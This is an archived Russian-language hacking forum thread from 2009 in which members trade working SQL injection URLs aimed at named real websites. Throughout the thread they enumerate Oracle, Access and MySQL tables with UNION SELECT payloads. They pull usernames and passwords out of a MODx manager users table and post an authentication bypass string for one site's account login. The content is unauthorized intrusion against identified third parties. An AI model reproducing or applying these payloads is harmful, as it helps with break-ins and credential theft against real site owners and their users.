ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #8601  
Старый 19.08.2009, 19:57
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Цитата:
Сообщение от Saiga  
2 z00MAN

Блин я не могу запустить, нету прав админа на компе (((. попробовал : madnet.name/tools/madss/ ..... ничего не показал. Есть что нибудь еще ?
заюзай дедик стоит 1-3 бакса
 

  #8602  
Старый 20.08.2009, 16:30
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)
Цитата:
http://www.kstu.ru/1leveltest.jsp?idparent=189+select+union+null+from +SYS.DUAL
 

  #8603  
Старый 20.08.2009, 17:23
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от edge911  
помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)
Гнусный оракл

http://www.kstu.ru/al_spis_sotr.jsp?first=9'+union+select+null,table_ name,null,null,null,null,null+from+sys.all_tables--+
 

  #8604  
Старый 20.08.2009, 18:33
fraIzer
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551

Репутация: 13
По умолчанию

del

Последний раз редактировалось fraIzer; 20.08.2009 в 21:18..
 

  #8605  
Старый 20.08.2009, 18:35
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

Microsoft JET Database
Цитата:
http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+golovoi_op_ stenu
не как не могу подобрать таблицу =(

Последний раз редактировалось edge911; 20.08.2009 в 18:37..
 

  #8606  
Старый 20.08.2009, 18:47
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user
 

  #8607  
Старый 20.08.2009, 18:53
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

Цитата:
http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user
уверен ?
Цитата:
"select ... from user" использоваться нельзя, так как user это внутреннее имя и таблицой оно быть не может.
_http://forum.antichat.ru/threadnav50550-3-10.html

Последний раз редактировалось edge911; 20.08.2009 в 18:58..
 

  #8608  
Старый 20.08.2009, 18:58
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

К MSysObjects доступа нет, так что только перебором

Кста там обход авторизации возможен http://www.bestperiodica.com/MyAccount.asp
В E-mail ' or '1'='1#
в пароль что угодно
 

sql inj
  #8609  
Старый 20.08.2009, 19:10
lucky_guy
Новичок
Регистрация: 17.08.2009
Сообщений: 11
Провел на форуме:
25459

Репутация: 3
По умолчанию sql inj

короче, есть бажный сайт:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
в нем столько табличек:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+informati on_schema.tables+limit+86,1/*
самые интересные это:
modx_active_users -тридцатая
modx_manager_users -37
modx_web_users -66
из них получаем столбцы:
username
password
но когда я хочу просмотреть эти столбцы вводя например вот это:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+1,1/*
то никакого имени и пароля не получается!
может я не так что-то делаю, помогите кто может.
 

  #8610  
Старый 20.08.2009, 19:35
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

lucky_guy, выводи во 2ое поле...
Цитата:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,concat_ws(0x3a,id,username,pa ssword)+from+modx_manager_users/*

Последний раз редактировалось RulleR; 20.08.2009 в 19:40..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ